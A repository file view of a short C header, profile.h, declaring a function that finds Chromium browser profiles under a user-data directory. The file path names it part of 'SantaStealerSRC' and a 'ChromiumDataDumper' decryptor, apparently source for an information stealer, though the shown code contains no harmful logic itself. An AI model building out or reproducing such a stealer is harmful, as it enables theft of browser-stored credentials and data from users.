Files
SantaStealerSRC/ChromiumDataDumper/decryptor/include/profile.h
T

8 lines
146 B
C
Raw Normal View History

2026-08-27 11:22:14 -06:00
#ifndef PROFILE_H
#define PROFILE_H
#include "types.h"
ProfileList* profile_find_all(const wchar_t* user_data_root);
#endif // PROFILE_H